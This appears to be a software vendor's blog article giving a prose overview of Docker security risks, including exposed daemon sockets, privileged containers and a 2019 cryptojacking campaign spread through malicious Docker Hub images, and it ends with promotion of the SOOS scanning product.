Since 2013, Docker has enabled rapid development and deployment of web applications. With its innovative approach to containers, Docker also pioneered a way to distribute highly secure applications. Nonetheless, security is never perfect. With even the most popular docker images containing vulnerabilities or malware, a hard look at Docker security issues is a wise move for developers.

Docker Simplifies Web Deployment

The foundation of a Docker application is the container image. This image is an executable package of code, binaries, libraries, and configuration settings. The code for a Docker image consists of stacked collections of instructions, called layers. To create Docker container image code, a developer can begin by pulling a proven base layer from the Docker Hub, an open-source repository. With the base in place, the coder can pull more layers from the hub or add custom-written code. The ability to build powerful applications by stacking layers in this fashion helps explain the popularity of the Docker environment.

All of the layers in a Docker image exist in read-only status, contributing to their security. Running a container image creates a Docker container, a full-functioning self-contained application. This container exists inside of a virtual host. It is possible to have many containers running simultaneously inside the host. All of the host’s containers share a single instance of the Linux operating system.

Docker likens the relationship between these hosted containers as similar to a simple ethernet computer network. In such a network, a single switch connects all devices. With each device, a set of permissions governs how the device will interact with its network partners. While an individual container is by default isolated, much of the power of Docker hinges on containers communicating with one another. Therefore, developers must exercise extraordinary care when configuring permissions between containers. When coders slip up, a skilled hacker can wreak havoc.

Efficiency Creates an Opportunity for Hackers

Docker was designed to be an evolutionary step beyond virtual machines. With a VM, each containerized package in a host needs a complete instance of an operating system. Docker’s method of hosting applications effectively removes this layer of operating systems and runs containers atop a single Linux OS. By sharing the operating system among the containers in a host, Docker fostered a less resource-intensive deployment model.

Unfortunately, Docker’s approach also brought security consequences. In an operating system, the kernel is the code that controls the OS. To a hacker, the OS kernel is as valuable as the crown jewels. By removing an OS layer, Docker removed an obstacle between hackers and the all-important kernel and set the stage for devilry.

The Daemon Is in the Details

A Docker host maintains a UNIX socket file as an application programming interface for running all of the host’s containers. A service known as a daemon performs tasks when commanded by the API. To function, many containers must communicate with this interface. In programming lingo, establishing this pathway is known as mounting the socket. For a threat actor, gaining access to a container connected to the API and its daemon is highly desirable.

An opportunistic hacker can use a wrongly configured TCP port to gain access to a container. If this container has mounted the UNIX socket, a hacker may gain easy access to the root directory of the host. With root directory access, it is a hop, skip, and jump to the socket file, control of the host, and substantial access to all running containers.

Hackership Has Its Privileges

With a narrow group of Docker users, access to the physical hardware of the host computer or attached devices is necessary. Use cases may include access to network hardware or data from internet-of-things devices. To handle this situation, Docker allows users to enable privileged status for a container at runtime. Privileged may be an understatement in this context. With the privileged flag set, a container breaks free of nearly all of Docker’s isolation constraints.

As long as a privileged container remains uncorrupted and sticks to its intended tasks, this status presents no difficulties. If a hacker can gain access to a running privileged container, however, catastrophe may result. Possible actions include overwriting of hashed security keys, deletion of entire disk partitions, or erasure of IoT devices. Therefore, with a privileged container, correct port configuration is an existential duty.

Cryptojackers Make Their Move

With a cryptocurrency, mining is the process of adding a new block to the currency’s blockchain. Winning the race to add this new block nets the miner a handsome reward, thus explaining the appeal of mining. Successful crypto mining requires extraordinary levels of computing power, and lawful miners invest hundreds of thousands of dollars in specialized hardware. Crooked miners, known as cryptojackers, merely steal computing power from corporate networks.

A Rude Surprise

As cryptojacking afflicted more and more networks, many corporate IT specialists believed that the isolation features of Docker largely protected their container deployments. In 2019, these professionals learned that they had underestimated the cryptojackers’ ingenuity. The cyber crooks began by seeding a half-dozen malicious images to the Docker Hub. With the image pulled and built into a container by a victim, a five-step process came into play:

1. The malware installed the dependent packages needed for the mining application.
2. The package then installed Tor on the victim’s host machine. Tor is an onion router, a way to conceal the destination point of the hijacked processor cycles.
3. The illicit package then installed XMRig, an open-source crypto mining app.
4. Next came the establishment of a proxy chain. A proxy is an intermediate computer between the victim’s machine and the criminals’ home base. A proxy chain rotates among different computers to allow for broken connections.
5. The final step was copying an external Python script to serve as an entry point.

When the cryptojackers remotely triggered the script, the crypto mining application sprang to life. By carefully metering their theft of computer cycles, the cryptojackers operated under the radar of the corporate IT pros. Before the discovery, the malicious images received over two million pulls from the Docker Hub. At least two thousand victims became unwilling members of the cryptojackers’ mining pool.

No Letup in Sight

Compounding the difficulties for corporate Docker users, the success of cryptojackers emboldened other cybercriminals to launch distributed denial-of-service attacks. DDoS attacks use networks of bots to flood a victim’s network with requests, thus paralyzing the service.

How do the crooks gain access? A misconfigured container with an open port and access to an API is the typical avenue of these exploits. Though the 2019 scheme received heavy coverage in the IT press, cryptojacking remains a leading motive for Docker attacks. To the exasperation of cybersecurity pros, this type of malware is difficult to find with conventional scans. Some security specialists believe the best way to detect cryptojacking malware is to begin by closely monitoring hardware for slowdowns or operating temperature increases.

To head off this misery, Docker urges most users to avoid exposing any APIs to the internet. With the select group of corporate users who must allow access, the recommendation is a virtual private network for a narrow group of vetted users. As for slamming the software door on threat actors, a good starting point is the first step in Docker development: image building.

Image Consciousness Pays

The ongoing success of cryptojackers points to a fundamental misunderstanding among many Docker developers. Docker’s encapsulation aids security, but protection is not guaranteed. The Docker documentation features multiple red-outlined warnings on the consequences of misconfiguring ports or neglecting flag settings.

While the environment’s container image building process enables rapid deployment, Docker consistently advises developers to keep their images as lean as possible. A reliably functioning Docker image is not necessarily an optimized image. Beyond enhancing security, lean images aid portability with smaller file sizes and also improve execution speed.

As for the configuration issues that open the door to cyber crooks, developers need to remind themselves that “README” files bear that title for a reason. Containerized software may well be the wave of the future. The developers who slow down and take pains with security are likely to see the most rapid success.

Security Always Matters

As this overview of Docker vulnerabilities demonstrates, programmers can never lower their guard with security. From the moment of deployment, a developer’s reputation is on the line, and that means security is not an option. To help with this essential mission, developers have SOOS. Shouldering the burden of software composition analysis, SOOS scans every component of every project for nearly 150,000 vulnerabilities. The SOOS dashboard then lets developers quickly size up issues and prioritize problem areas for eradication.

Close on the heels of security is the need for license compliance. A SOOS scan reveals the license status of every package and dependency. SOOS integrates smoothly with a host of tools and frameworks, eliminating migration hassles. For security, compliance, and governance, SOOS is the total SCA solution.